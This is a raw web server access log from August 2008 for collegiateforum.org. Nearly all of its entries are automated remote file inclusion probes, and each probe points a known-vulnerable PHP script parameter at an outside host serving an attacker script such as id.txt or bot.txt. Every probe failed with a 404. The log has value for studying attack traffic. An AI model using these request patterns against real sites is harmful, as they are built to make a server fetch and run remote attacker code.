66.135.41.76 - - [25/Aug/2008:07:21:44 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:21:44 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:21:44 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:22:31 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:22:31 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:22:58 -0700] "GET /logs/access.log//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:22:58 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:22:59 -0700] "GET /logs//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:07:23:01 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:23:15 -0700] "GET /index.php?conteudo=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:25:42 -0700] "GET /logs/access_080310.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:25:42 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:25:42 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:26:15 -0700] "GET /logs/access_080623.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:27:00 -0700] "GET /logs/access_080331.log//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:27:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:27:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:27:16 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:27:22 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:26 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:26 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:27 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:27 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:28:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:28:32 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:29:00 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:29:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:29:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:29:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:29:20 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.194.76.177 - - [25/Aug/2008:07:29:26 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
82.194.76.177 - - [25/Aug/2008:07:29:26 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
217.16.26.124 - - [25/Aug/2008:07:30:51 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
217.16.26.124 - - [25/Aug/2008:07:30:51 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
217.16.26.124 - - [25/Aug/2008:07:30:51 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:31:02 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:31:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:31:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:31:31 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:32:12 -0700] "GET /index.php?inc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:32:27 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:33 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:33 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:34 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:34 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:34 -0700] "GET /logs/access_080331.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.130.79.132 - - [25/Aug/2008:07:32:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:33:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.6.22.105 - - [25/Aug/2008:07:33:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.22.105 - - [25/Aug/2008:07:33:48 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:35:03 -0700] "GET /logs///newspublish/include.php?path%5Bdocroot%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:35:59 -0700] "GET /logs/access.log/index.php?inc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:36:02 -0700] "GET /index.php?inc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:36:02 -0700] "GET /logs/index.php?inc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:36:37 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:07:37:06 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:07:37:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:07:37:07 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:37:30 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:37:30 -0700] "GET /logs/access_080128.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:37:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
82.194.76.177 - - [25/Aug/2008:07:38:24 -0700] "GET ///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
82.194.76.177 - - [25/Aug/2008:07:38:24 -0700] "GET /logs///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
66.185.168.98 - - [25/Aug/2008:07:38:25 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:39:06 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:39:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:39:39 -0700] "GET /logs/access.log//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:39:40 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:39:43 -0700] "GET /logs//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:40:09 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:40:09 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:40:09 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:40:15 -0700] "GET /logs/access.log//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:40:17 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:07:40:18 -0700] "GET /logs//index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:41:36 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:41:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.113.53.6 - - [25/Aug/2008:07:41:37 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:42:01 -0700] "GET /logs/access.log/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:42:01 -0700] "GET /index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:42:01 -0700] "GET /logs/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:42:16 -0700] "GET /logs/access_080324.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:42:16 -0700] "GET /home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:42:16 -0700] "GET /logs/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:42:47 -0700] "GET /logs/access_080211.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:43:04 -0700] "GET /logs/access_080324.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:43:05 -0700] "GET /home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:43:05 -0700] "GET /logs/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:07:43:08 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:07:43:09 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:07:43:09 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:43:13 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:43:14 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:43:14 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:43:40 -0700] "GET /logs/access_080324.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:43:40 -0700] "GET /home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:43:40 -0700] "GET /logs/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:43:47 -0700] "GET /logs/access.log/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:43:47 -0700] "GET /index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:43:48 -0700] "GET /logs/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:44:08 -0700] "GET /logs/access_080211.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:44:20 -0700] "GET /logs/access_080324.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:44:21 -0700] "GET /home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:44:21 -0700] "GET /logs/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:44:23 -0700] "GET /logs/access_080211.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
